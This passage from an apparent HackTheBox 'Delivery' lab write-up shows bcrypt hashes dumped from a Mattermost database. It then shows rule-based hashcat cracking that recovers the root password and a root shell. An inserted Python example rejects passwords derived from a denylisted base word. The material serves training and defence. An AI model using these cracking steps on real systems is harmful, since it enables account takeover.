    | root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
    | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
    | channelexport                    |                                                              |
    | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
    +----------------------------------+--------------------------------------------------------------+
    8 rows in set (0.000 sec)

    MariaDB [mattermost]>

    eneloop@kinetic:~$ hashid '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO '
    Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
    [+] Blowfish(OpenBSD)
    [+] Woltlab Burning Board 4.x
    [+] bcrypt
    eneloop@kinetic:~$

https://www.4armed.com/blog/hashcat-rule-based-attack/

    eneloop@kinetic:…/lab/hackthebox/delivery$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout passwords.txt
    PleaseSubscribe!
    !ebircsbuSesaelP
    PLEASESUBSCRIBE!
    pleaseSubscribe!
    PleaseSubscribe!0
    PleaseSubscribe!1
    PleaseSubscribe!2
    PleaseSubscribe!3
    PleaseSubscribe!4
    PleaseSubscribe!5
    PleaseSubscribe!6
    PleaseSubscribe!7
    PleaseSubscribe!8
    PleaseSubscribe!9
    PleaseSubscribe!00
    PleaseSubscribe!01
    PleaseSubscribe!02
    PleaseSubscribe!11
    PleaseSubscribe!12
    PleaseSubscribe!13
    PleaseSubscribe!21
    PleaseSubscribe!22
    PleaseSubscribe!23
    PleaseSubscribe!69
    PleaseSubscribe!77
    PleaseSubscribe!88
    PleaseSubscribe!99
    PleaseSubscribe!123
    PleaseSubscribe!e
    PleaseSubscribe!s
    PleaseSubscribea
    PleaseSubscribs
    PleaseSubscriba
    PleaseSubscriber
    PleaseSubscribie
    PleaseSubscrio
    PleaseSubscriy
    PleaseSubscri123
    PleaseSubscriman
    PleaseSubscridog
    1PleaseSubscribe!
    thePleaseSubscribe!
    dleaseSubscribe!
    maeaseSubscribe!
    PleaseSubscribe!
    PleaseSubscr1be!
    Pl3as3Subscrib3!
    PlaseSubscribe!
    PlseSubscribe!
    PleseSubscribe!
    PleaeSubscribe!
    Ples
    Pleas1
    PleaseSubscribe
    PleaseSubscrib
    PleaseSubscri
    PleaseSubscriPleaseSubscri
    PeaseSubscri
    ribe
    bscribe!easeSu
    PleaseSubscri!
    dleaseSubscrib
    be!PleaseSubscri
    ibe!
    ribe!
    cribcrib
    tlea
    asPasP
    XleaseSubscribe!
    SaseSubscribe!
    PleaSu
    PlesPles
    asP
    PlcrPlcr
    PcSu
    PleasS
    PeSubs
    eneloop@kinetic:…/lab/hackthebox/delivery$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout passwords.txt > passwords-hashcat.txt
    eneloop@kinetic:…/lab/hackthebox/delivery$

    eneloop@kinetic:…/lab/hackthebox/delivery$ cat hashes.txt
    $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
    eneloop@kinetic:…/lab/hackthebox/delivery$

    eneloop@kinetic:…/lab/hackthebox/delivery$ hashcat -m 3200 -a 0 hashes.txt passwords-hashcat.txt
    hashcat (v6.1.1) starting...

    OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
    * Device #1: pthread-Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz, 5851/5915 MB (2048 MB allocatable), 4MCU

    Minimum password length supported by kernel: 0
    Maximum password length supported by kernel: 72

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
    Rules: 1

    Applicable optimizers applied:
    * Zero-Byte
    * Single-Hash
    * Single-Salt

    Watchdog: Hardware monitoring interface not found on your system.
    Watchdog: Temperature abort trigger disabled.

    Host memory required for this attack: 65 MB

    Dictionary cache built:
    * Filename..: passwords-hashcat.txt
    * Passwords.: 77
    * Bytes.....: 1177
    * Keyspace..: 77
    * Runtime...: 0 secs

    The wordlist or mask that you are using is too small.
    This means that hashcat cannot use the full parallel power of your device(s).
    Unless you supply more work, your cracking speed will drop.
    For tips on supplying more work, see: https://hashcat.net/faq/morework

    Approaching final keyspace - workload adjusted.

    $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: bcrypt $2*$, Blowfish (Unix)
    Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
    Time.Started.....: Sun Jan 31 11:17:48 2021 (1 sec)
    Time.Estimated...: Sun Jan 31 11:17:49 2021 (0 secs)
    Guess.Base.......: File (passwords-hashcat.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........: 89 H/s (6.70ms) @ Accel:32 Loops:8 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 77/77 (100.00%)
    Rejected.........: 0/77 (0.00%)
    Restore.Point....: 0/77 (0.00%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
    Candidates.#1....: PleaseSubscribe! -> PeSubs

    Started: Sun Jan 31 11:17:47 2021
    Stopped: Sun Jan 31 11:17:50 2021
    eneloop@kinetic:…/lab/hackthebox/delivery$
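The config.json shown earlier sets PasswordSettings to a 10-character minimum with lowercase, uppercase, number and symbol all required, and the recovered password satisfies every one of those rules while still being one of the 77 rule-generated candidates listed above. The following is an added example, not from the original write-up and not Mattermost code: a password-acceptance check that applies the same complexity rules and additionally rejects values that reduce to a denylisted base word. The function names, the leet map and the accepted sample password are constructed for illustration; the denylist entry and the rejected samples are taken from the candidate list above.

```python
import re
from typing import Iterable, Optional

# Common character substitutions undone before comparison (assumed mapping).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})


def meets_complexity(pw: str, min_len: int = 10) -> bool:
    """Mirror of the PasswordSettings shown on the page: length + 4 classes."""
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    return len(pw) >= min_len and all(re.search(c, pw) for c in classes)


def letters_only(text: str) -> str:
    """Lowercase and drop everything except a-z."""
    return re.sub(r"[^a-z]", "", text.lower())


def derived_from(pw: str, bases: Iterable[str], min_core: int = 5) -> Optional[str]:
    """Return the denylisted base word `pw` reduces to, or None.

    Covers case changes, appended/prepended digits and symbols, leet
    substitutions and reversal. Truncated forms of the base word are
    not covered.
    """
    lowered = pw.lower()
    forms = set()
    for variant in (lowered, lowered.translate(LEET)):
        core = letters_only(variant)
        forms.update((core, core[::-1]))
    for base in bases:
        base_core = letters_only(base)
        if len(base_core) >= min_core and any(base_core in f for f in forms):
            return base
    return None


def evaluate(pw: str, bases: Iterable[str]) -> str:
    """Decision a signup or password-change handler would act on."""
    if not meets_complexity(pw):
        return "reject: complexity"
    if derived_from(pw, bases) is not None:
        return "reject: derived from denylisted base"
    return "accept"


# Base word as it appears at the top of the candidate list on this page.
DENYLIST = ["PleaseSubscribe!"]

if __name__ == "__main__":
    samples = [
        "PleaseSubscribe!21",       # from the page: passes complexity
        "Pl3as3Subscrib3!",         # from the page's candidate list
        "Tr4verse-Quiet-Lantern",   # constructed, unrelated to the denylist
    ]
    for pw in samples:
        print(f"{pw!r}: {evaluate(pw, DENYLIST)}")
```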

    maildeliverer@Delivery:/opt/mattermost/config$ su - root
    Password:
    root@Delivery:~# cat root.txt
    aa1XXXXXXXXXXXXXXXXXXXXXXXXd36c25
    root@Delivery:~#

Notes: